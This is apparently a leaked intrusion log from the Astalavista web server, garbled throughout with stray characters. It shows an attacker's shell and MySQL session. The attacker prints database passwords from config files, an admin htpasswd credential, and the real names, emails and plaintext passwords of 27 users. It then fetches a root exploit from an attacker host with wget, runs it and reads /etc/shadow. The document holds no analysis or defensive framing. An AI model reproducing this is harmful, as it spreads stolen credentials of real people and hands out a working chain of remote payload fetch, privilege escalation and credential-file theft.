( ?9 ~2 P4 e6 F4 n* Mdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .9 s( j) K( d* l% F9 ? e
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..: ]9 p8 [% c" {2 X, p r
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0079 d, M$ F3 ~3 \- b6 @) |! g
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
5 V2 ]1 r8 Z! e7 Pdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
/ T- L6 @, n% Adrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend: j4 U% U) {: B) r1 w
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner4 t- T8 D$ _4 u& A# y. N6 o
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
- o8 N! o8 ~7 Fdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
M5 W0 r0 [1 Z3 \1 Cdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron- z$ _" t. D! y# ]/ s
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
4 z! b7 i9 m+ i% R6 {$ Z$ v- |-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
1 |) v( N; M% W: V-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico) V2 s6 |* H8 _# M' y! ~7 }$ `
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed' p* R+ m- O: l+ {2 [
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
8 r0 v' N) b9 K; L$ |-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess! h. m2 l- B% U6 N4 X1 y# F
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
( G0 C9 C# ~0 |) N7 k0 A-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php. Y. ?* s! U2 |& P% K
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html, Z( V1 q% K5 w/ ]9 w
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
- p! w9 l; O) i8 A& e-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
" O9 R p0 S2 ]: M" u6 Y-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
+ w B5 R9 S* Fdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc1 ?& Z) E2 U$ c: z N" m6 B
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang( ~1 C, k& K& D% h
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
7 p/ [; Y. x! r) M3 ?drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log" H4 R" H! K) ^. p, B5 g% B/ b, s7 B0 p) r
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
7 |6 ^& \ m" q; Udrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
( [, {6 O$ e! T y& v6 l8 ydrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
* Z/ d: z+ `8 C4 @1 ^) W+ m-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf5 a" Z+ ~8 m2 d( M! c
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re/ ] Z& d$ V; z, d4 h6 t: C
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt* t+ f8 X: N7 b$ _
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
* ]; C* ~3 @' r! Hdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources3 V9 Y! k3 |* }, R1 Z
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com4 I7 O8 u! ~* E3 D; z+ R
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
" y% Y. E) y' _, @1 \drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src8 }# Q6 M# y6 {, [' E/ w, N
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl5 s* H# R( ]9 \! ]0 m0 q2 W
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v25 p, D; S0 J/ D5 m! ^+ w
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old7 z( l/ B7 d2 r
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
9 ]' h2 z2 `$ V; o" U2 }. W; v+ zdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
9 t# Q( Q2 p5 B3 O2 A$ _/ }. D+ \- s8 s
sh-3.2$ head -20 index.php
$ b7 C* x& S5 ~: {2 Y<?PHP
; ], v2 A8 X( R# T- z V$ N/**
1 W# H/ x% f9 h+ n8 E* Mainfile (external) for astalavistaNET v2.0
) t, v# b& W' i*
3 a: ?2 w% N0 d2 w2 R* @copyright Astalavista IT Engineering GmbH
3 L4 _7 W2 P! q* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>+ [* Y7 H$ t4 b2 q( Z( ~9 s2 r
* @version 1.0
. i7 C- V4 O; d$ p( s5 {*/( k1 u+ z9 h- x. ^4 X& G i, K
. }1 V; C+ s+ p* G- E' m0 _
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {6 E3 \4 ?2 Q- _1 D! y+ N0 T/ g" \: Q D
$dontStartSession = false;
/ q& U& C' y8 S" ~ } else {7 V6 w7 G0 M A$ ?- l$ E1 m( l0 ?
$dontStartSession = true;
$ F+ w w( o4 M2 e$ }" `* ]# l6 c }
?/ Q; S5 ~! I require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);' K$ {( @# y) {6 ?! Z% x+ N5 ?
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
8 W( o# z& t5 y5 s6 n" a' c require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
% `( T3 D( Q0 `1 ~. H9 \ require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
6 c" b: S* @4 C% p
+ r3 r" X3 ~6 D5 \" X% V* ^) Tsh-3.2$ cd config6 s3 @0 D6 Y9 I2 l5 k+ [% k8 b
sh-3.2$ ls -la
# e( v* X& b, z6 _, Ktotal 32
! s# F! E7 z$ j3 mdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .$ I( F8 b1 ?1 j7 Y7 o
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..7 L' h* c) Q2 s, s1 w7 C3 B
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
8 X! g1 R6 G: P8 [' k-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
# t8 l: d2 Q" g6 g p- Z' j-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
# t. H5 m" p" s' b$ |4 [-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php% u3 O. V9 ~& s9 Q
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php: r) r3 }0 _" T+ x, ^
; r l. m w9 |: osh-3.2$ cat com.conf.php% M( P, a s9 V8 ]/ {+ W8 w. ?
[snip]
2 @9 l; T$ p5 C, f$ n//member-database# M1 U; v! C& t( T; m
$_CONFIG['db_mem_server'] = ‘localhost’; S9 O3 w& f9 ~6 b) S) V
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
; f2 |( ^ Y% A; n t$_CONFIG['db_mem_user'] = ‘astanet_db’;0 [: X, x- A( n1 t$ W' K
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;% X5 A2 z/ j# ?# ^0 {% T
$_CONFIG['db_mem_debug'] = false; //true or false2 l5 V7 N" n {. z6 {
//ads-database
6 k. }2 v5 ]' M `3 X4 S1 m* f$_CONFIG['db_ads_server'] = ‘localhost’; c& f; z0 z A4 W
$_CONFIG['db_ads_database'] = ‘astanet_ads’;" Y+ d: ]* G5 }% e8 E7 n9 H
$_CONFIG['db_ads_user'] = ‘astanet_db’;. J$ E# K9 g) Z4 D: L- i
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;* V3 a1 R! f! n, l1 b# E/ W
$_CONFIG['db_ads_debug'] = false; //true or false
; p' W# y9 |. J/ k//rainbow-database
" v1 w! I% D7 T, B; F* e& C6 x+ e' G7 n$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;* }3 u2 U' E$ f' G; j P
$_CONFIG['db_rainbow_database'] = ‘rainbow’;1 W+ ]+ A- R- v( `+ g7 H) Z
$_CONFIG['db_rainbow_user'] = ‘dinu’;
# l0 k1 b" W4 C1 @$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
) o# f* b: u* O8 }% t9 f, Y$_CONFIG['db_rainbow_debug'] = false; //true or false
, Y$ a( u+ c5 @4 O6 H" L//mailing lists database
% x0 V* K- Y" m, g3 F' y$_CONFIG['db_mailing_lists_server'] = ‘localhost’;/ {' T& s- v0 U5 ~0 T. l
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;6 c, X Q5 r* Q2 \
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;# Z" N1 u9 f- \0 t K5 ?
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
7 L* n5 s; P! M, r$_CONFIG['db_mailing_lists_debug'] = false; //true or false
' V, ~ a6 n- i//paypal; T7 b& u3 P1 j6 f
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;9 S; Y6 U7 n# a9 {! [+ }
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
: o" F; e; f" V/ t: {1 C6 v) g0 {$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
2 S" U4 w$ ?, ?5 H0 h# c4 y$_CONFIG['sub_pp_noship'] = ‘1′;
* T9 W- R1 p, v" y0 r1 A6 I2 a$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
% A p1 h% R( m& O+ l2 T[snip]
6 z& H. X! {4 T! O- w% S6 R0 \2 Q) e4 B. ]: V, f i( _# C
sh-3.2$ cd ..3 H7 V2 E9 B$ _
sh-3.2$ cd member, u9 F- E, f" F3 O/ ^6 S9 k
sh-3.2$ ls -la
+ m& }$ z) M$ Qtotal 20
* S& ?3 T$ G2 a% m7 fdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .6 C. O6 z- G5 P8 ]1 i
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
8 p7 V4 n0 A- p% L4 S7 ?-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess0 S' c% K# o: x W7 E! M6 c
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php% N; i+ V% Q' }! `% l& h: k( ^& W1 Z
sh-3.2$ cat .htaccess- D, B$ ?' [3 e" N) Q2 Y$ o
SecFilterEngine off
1 w, x1 ?( s1 Y3 R9 ~, K; ]3 @% e) H5 C1 S* I
sh-3.2$ cd .. ^" \+ B3 L. y( t- A" N/ h% Z
sh-3.2$ cd cron
! U' ~* \3 O8 X) k% ssh-3.2$ ls -la H1 F* r4 b) {. t2 d; p* x
total 168
+ H7 g6 b8 V5 S' L0 cdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
2 ?$ ]5 H8 \0 ^6 Q0 T+ Cdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..5 ^4 l* p+ ]' A3 P7 o! Y
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
- t, h$ |- [4 ~) i-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
: L" {& y% G4 W: Y2 _-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
4 G+ W( L( |- Q2 V" m& g-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
: z4 P- h z9 @1 Q# p4 S2 g-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php6 Y8 X5 _6 M, O1 f) D, h
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
; r+ V& u2 d# r3 I-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
; l( e- A" K2 u$ |( g# u7 b' n" l-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
$ T" d- H, o% t0 X2 h: R-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
5 J( S/ ~1 [& n-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
1 w* A1 F2 L$ x" W7 j- }8 G, ?-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
1 Q$ F! N* M" P-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
+ u; u& Q) z% A: y5 M. P/ \/ p2 S6 k-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
0 r$ B; g* ~/ w4 N2 A% E4 I-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
2 D& V& x( Z# B7 u-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php; `9 b" D- S) n6 w: `7 v* G& n
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php; X; }5 z, U( _( \
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php2 p6 w/ H, @9 r+ N
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php6 ^! x" Z! s2 f1 a8 h
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
2 E7 c3 _, N2 q# E' d; P4 h/ g-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
( S6 r4 G: b! W) n" S-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php1 k$ r% s% Y) i3 Y0 r& l
" u+ \" w7 p% b, U$ C8 R2 Q
sh-3.2$ cd ..# }% D- J2 {" m$ [( J! K& V
sh-3.2$ cd _007
% M% | G! N$ n+ vsh-3.2$ ls -la
7 d* w4 m( E! W; l) ~9 g$ m/ |9 itotal 24% P- a+ K3 x X( c
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .& c4 C* K9 Q0 c
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
7 T2 n3 H5 ` ^-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
5 R0 C7 S8 Z. ] x E5 T-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php! S3 G2 Q2 p# }& K1 m% m- Y
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php- c) B T0 {% z, [' s. H: R
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap' d( q& y" F% u
' o$ C; i1 j) a$ D& _+ M: M
sh-3.2$ cat .htaccess
) l8 V' c7 n0 g7 G/ GauthType Basic) p! q; Y& y/ u( V% r8 K
authName Admin
3 ~6 c ^. D; p" |; ]authUserFile /home/astanet/auth/.htadm_pwd
8 @! `& |$ W! u3 Jrequire valid-user
: W6 O2 u6 q. k( E/ C5 @7 h% \% d) A L; c6 ~, ^( ]: }8 j
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
9 ]& ~. @: P9 I; Q' T; O& Iadmin2net:CR0bl65MwhfT
; E5 @8 P( A/ s; r8 L$ `8 H0 n# g7 e" W$ }! L7 o1 Z# O
sh-3.2$ mysql -u astanet_db -p
- q9 `- z% f! p/ e+ w/ UEnter password:
, f6 J7 E# ^3 }, n j" i$ Q9 E& cWelcome to the MySQL monitor. Commands end with ; or \g.
! Z1 Z7 f8 M9 G8 l% xYour MySQL connection id is 275153
1 y. Q0 k: y. z* X% r* AServer version: 5.0.45-community-log MySQL Community Edition (GPL)" v: Q2 }( m: T/ C3 j
6 S" h, O5 [9 uType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
. J- x* j4 w7 ?8 G! T9 y
' U0 K7 W8 b& D4 b1 ]. B2 Gmysql> show databases;
9 H* X* q" E! V3 h+———————–+
7 k+ U6 p6 D! h! p9 j: ?| Database |
8 i2 ?8 S& q' a* ^% E: Y/ p+———————–+
3 @& K% E, b/ m, Y| information_schema |6 M$ L( m3 [4 b8 y6 q* y7 z5 n& \
| astanet_ads |
; |2 W& F/ \& H& L/ v" a| astanet_mailing_lists |3 z% f7 n* L2 _; Y0 E& k' D( P
| astanet_mediawiki |% T1 A8 [3 D- d' k X2 W
| astanet_membersystem |
+ e+ C/ Y# u& ~( j: }/ y+ z% [| test |
. d8 s5 ?! o+ k0 L# \+ V+———————–+
# i+ [# w# H: j( s- _* Z& ]6 rows in set (0.00 sec). }) C1 F P* O$ L3 K
' n$ y7 e3 X0 \6 rmysql> use astanet_membersystem
$ ]$ z5 }+ H h! n" \Database changed0 f. l5 y6 ^! Y% G/ E5 a6 e T7 e4 U. n2 E; F
mysql> show tables;
. R4 u/ T! X1 }" o+———————————–+
8 Y, T: Z2 K7 I8 e| Tables_in_astanet_membersystem |2 i% p1 _8 B- }4 P1 o
+———————————–+8 o& c i R) Y
| blacklist_categories |. ~) L- A9 h; W3 z
| blacklist_content |
' _: O' @0 e2 {) a5 W# _| blacklist_levels |+ E! k0 l: x" v0 p
| blacklist_mcset |
/ i! G: O8 y. O& G5 R {| dir_categories |( e. j& y8 b; D/ o! N% s, g
| dir_comments |2 F* Q9 `/ g# r( k, r+ i# ^$ n
| dir_links |
0 M- g. h6 n% s5 N# H| dir_temp |6 v8 z9 F) j2 o/ q; F% ]
| dir_votes |: _. G7 k& T! v# i5 @% z
| documents |
4 r' {! x0 ]9 \. { {& E| documents_categories |
3 m) m& Z; O, ?( M! g| email_content |
5 ]- h& \( w/ Q. F/ ]| email_settings |
! S* R/ Q) s; e) X| exploits |1 F2 |6 v# c ^( K' ]1 a+ j
| exploits_categories |
4 A; h4 C6 X, L0 i9 Z| exploittree_categories |
" m s! z5 O6 g| exploittree_exploits |3 @0 j. ^; I3 [0 c9 t
| home_values |
& u) g( B& r7 L' k+ @& f5 s| iso_countries |( {& y# @4 F8 u& C
| links_categories | J! o" O% t! r2 s6 }
| links_records |2 O _1 n" d" s- d3 e
| links_unauth |1 g; o! q0 _" N7 E& n- y" @3 y
| links_votes |& o1 B; Z) k+ J
| log |
# C. b+ X* R) F% t| news_categories |, l6 {0 n7 A) Y7 n2 p. ^
| news_comments |% J( b' _/ g6 j. P7 I; w
| news_emoticons |
( s" [$ j" p$ r; j- ^. F! u4 X| news_latest |4 I- ]% o$ ]5 v! ?5 E* [
| news_messages |% W x7 s5 G0 W) p' d8 M. n" G
| news_statistics |
' H* Z1 f$ |5 ^/ D# M" A/ e F| news_votes |
6 r: U$ ?! a5 l% ]0 a6 }" N F| prices_content |
, q E2 h( e0 Y| prices_offers |
5 F% i4 u" h$ k3 G# _/ m6 s| rss_settings |$ T' Y, C6 |5 _1 A' {. A
| sessions |
$ [+ q0 A! _& `6 B| stats_signups |8 p) M" }; S2 _( J+ A
| u2u2 |& N. J" b3 q. z+ u5 l/ A
| u2u_contact |$ ^5 x$ |+ [5 Y+ V
| u2u_settings |/ D, Q6 w) u) v1 K
| user_keywords_selected_categories |. d' y7 |8 _5 y$ b
| users |
: q8 E6 N$ F% x: J| users_ipn_test |, o6 R4 B, v2 s: _& |( u
| users_keyword_values |7 q3 ^/ @" ?7 E
| users_profile |/ i2 Q$ j# ]" j, u
| users_temp |
0 n1 W. u# |$ Y( y6 g6 i; @| users_upgrade |
/ B# R; a' j c: E" \0 g+———————————–+
* x1 G6 Q2 U& I* x46 rows in set (0.00 sec)- B! s+ X/ w0 G: f( Z( q
( E2 s- ^+ s* e3 d1 e# H8 Zmysql> describe users;; a- Y1 z# l3 k( w& P
+————————–+————————————–+——+—–+———————+—————-+
7 r( V, N8 l9 L/ @ z| Field | Type | Null | Key | Default | Extra |
9 `2 F5 S0 v! Q9 j1 y0 J+————————–+————————————–+——+—–+———————+—————-+0 J- A& Q: \) K1 |: [& G5 Q/ t P( u K
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |6 @- g7 c& w, o, b, C5 E% H8 r
| user | varchar(50) | NO | | | |
: I8 M1 W4 y$ Q9 r| nickname | varchar(30) | NO | MUL | anonymous | |, E! O7 d( H, \ p7 J/ U
| password | varchar(30) | NO | | | |5 R* g5 l: ~$ p
| userlevel | tinyint(3) | YES | MUL | NULL | |; Q4 X) H. [9 q+ J
| exp | int(8) unsigned | NO | | 0 | |
! {1 F& M5 I' U( c6 e% U| email | varchar(50) | NO | | | |+ K4 {: r9 h7 x7 |
| ip | varchar(15) | NO | | 0 | |
" W1 `; P* [/ g0 }$ r& \ u| proxy | set(’0′,’1′) | NO | | 0 | |- J3 n# C/ A, s1 A7 C& g$ ^7 [6 V
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |/ m& u, x- {$ r1 \% O
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
, G3 b3 }& b& f, h3 d8 h' [' [: d: j| anz_in | tinyint(1) | NO | | -1 | |
* R/ b7 s9 \0 S+ T| status | tinyint(1) unsigned | NO | | 0 | |
* k% b" h* F$ U8 m" u. h8 {| checked | set(’0′,’1′,’2′) | NO | | 0 | |- h6 @# G: [% }$ V/ @$ g! c6 v
| freemember | set(’0′,’1′) | NO | | 0 | |
" ~0 _8 g* s! J1 {7 G% w1 d' n3 _' s| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
* f4 F; ` I1 | z P3 N| lang | tinytext | NO | | | |9 l9 G R* l& ^5 u, F
| adid | smallint(6) | NO | | 0 | |
$ a+ ~, W$ R c4 q N& K| pp_txn_id | varchar(255) | YES | | NULL | |: B- \! d+ o7 v% z0 b' H
| cnb_transaction_id | varchar(255) | YES | | NULL | |
# R6 ?6 D& V3 n2 B8 d2 f| cnb_order_id | varchar(255) | YES | | NULL | |
9 b7 a9 _7 y7 G: D- Y3 L Z6 Z| cnb_user_id | int(11) | YES | | 0 | |
* d. o, {2 ]8 F+————————–+————————————–+——+—–+———————+—————-+
, H$ |) b5 p* x22 rows in set (0.01 sec)% R7 d) }1 `4 l
( p5 I8 ^3 F6 ~7 z. I
mysql> select count(*) as skids from users;; s4 ]! i1 W& Y! F, j& E
+——-+0 F' }0 I0 D/ r$ n9 n
| skids |
3 ~2 s; m$ |- S6 c+——-+1 ?8 g) x! h0 f2 ?
| 25199 |
8 u4 T+ }' r7 @3 f, H9 j+——-+
# M1 b" K5 ?* K ~7 `% D3 h5 {% D1 row in set (0.00 sec)
! L7 K0 I& h# Q( B( E, @* g6 u9 \3 y" ~! u& C2 G3 R
mysql> select user,nickname,password,email from users where userlevel = 1;
7 A5 S& x4 {- ? m% U5 A+————————–+———————-+——————+———————————–+/ w& f. i7 L3 |6 n% j
| user | nickname | password | email |- I* ~1 R- d4 L3 \/ `* \
+————————–+———————-+——————+———————————–+- b. _& p9 \$ a& R7 F1 _! w, ?; P4 J
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
( C" {2 B) p5 R& ]| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
% }* ~- s; v* Q% V7 C| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |% i4 f, D8 U2 J3 q# D
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
- A- n& T" C& _. E; s1 S' Z% O, C| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |* T% f$ t1 ^. ?; t, B2 d' `
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
/ W6 j' Z' C1 ?1 ~3 |% y: j2 W* u| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
2 L% L9 E2 h, V3 S| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |! O! }8 Z7 K" H1 J z. m
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |& q/ Q, v y5 M# S; y. B) e
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |6 l) D6 s7 A+ Z% z1 ~! B" K
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
9 X% F' D) |6 g3 g| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |) J: Q6 H5 ?+ @
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |9 z" |8 E3 V0 |. v
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |( E5 X! d! a4 r
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |& k4 s8 r9 }: ~+ y8 O
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
8 J* N2 V1 Q" F; F, W| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
d1 i1 c# ?* g' f4 O/ A| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |/ [* o. t" F: \/ b( c
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
1 r9 t3 D8 _' q* F1 ^. v| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |+ Z9 V! ^ j9 w. r. `$ Y
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |, c0 x& K B, Z2 m4 M }
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |8 P8 n0 o8 R4 E! f5 q
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |' G: f( [5 f) o. b9 O+ G
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |" \6 B. y% D7 o1 ]5 w! u+ ]; v
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
3 v# v7 o5 U8 w7 T7 a| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |6 \- d- s- t/ O/ S9 A
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |5 y& R# S5 u+ i4 i3 C
+————————–+———————-+——————+———————————–+, }' O! g6 a5 @# I; p; ?
27 rows in set (0.00 sec); m; w! d; F4 g; e7 _
* @$ v5 H1 i$ hmysql> exit; Q9 n L/ {4 }8 W1 \
Bye
* i2 N) P; T+ M8 v7 o* f! p
' G3 k! R9 T3 T[~] plaintext passwords? yes,
' |2 C1 N- J9 B+ O+ C6 e9 N6 CThose so called “security professionals” who charge you $6.66 / month to. S" T. z! H; U7 T8 x4 b
register at their hack-proof portal, save your passwords in plaintext…0 G! Q5 r9 G7 ^) A
brilliant!
* K+ ?9 t I, V5 o; n4 c$ c2 N9 n! I, Q) e: }8 x; }' n4 X
[~] This been fun but we want more.% [& Z$ i( U9 |5 k7 N R
- q& E) g0 b1 psh-3.2$ uname -a
# B3 ?6 r% a6 S u tLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
, j, l$ b/ Q* y" y5 v3 g7 {) d( Ish-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
7 \* s t( z1 y0 y* }–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]0 O. s/ L) _3 w. K \7 J
Resolving anti.sec.labs… 13.33.33.37
. j5 f6 w, c J8 K9 n1 ~" B2 f' B8 v) UConnecting to anti.sec.labs|13.33.33.37|:80… connected.' y$ b4 D3 s" j+ T. C; H
HTTP request sent, awaiting response… 200 OK
! V: A9 ]/ w P9 Z) X) I7 fLength: 18200 (18K) [text/plain]5 O, o0 T8 s; n+ |& A
Saving to: `g0troot’
" t- V# W9 e9 e9 C; B, F; F
- K* o; ~) _7 l1 W; `+ x2 s100%[=========================================================================================================================================>] 18,200 58.6K/s in- l. V. b5 e% Z: F
0.3s9 v# q. S: t3 v: S; T5 E
* s& E/ j: m6 ^ r# S, k18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]8 l) [" z7 ~" b/ x" V i
, T$ i" R$ S! N- O4 K6 M. I) N1 M
sh-3.2$ ./g0troot -i x86_64
2 f7 ~* I" W$ h) v& x6 m& [0 y4 S( |7 v! L[+] g0troot - anti.sec.labs. c: Q% v) W4 Q# I3 o) T# A
[+] Target: 2.6.18-128.1.10.el5
$ R) p' _% l+ n C[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]( E5 o. I5 J* \; \! u; N7 R1 r
! X% `& V3 p* \$ s' u/ {7 W[+] r00tr00t
- o, C2 {+ t& M6 f) b[~] Executing shell…
) w. L+ F' Y& h( i
- o$ a, w2 `# i; {: X: Ksh-3.2# id
$ B# C; C: M7 T, [4 L1 K' X# Wuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
4 ]$ I7 H ~) [" S4 S6 ]2 K5 X+ g1 r5 \& B' F2 u. {
sh-3.2# cat /etc/shadow
. E0 i) K' k( s& d6 c- Lroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::7 Y! h ?0 l' G2 {# Q W6 N( x1 _/ I
[snip]
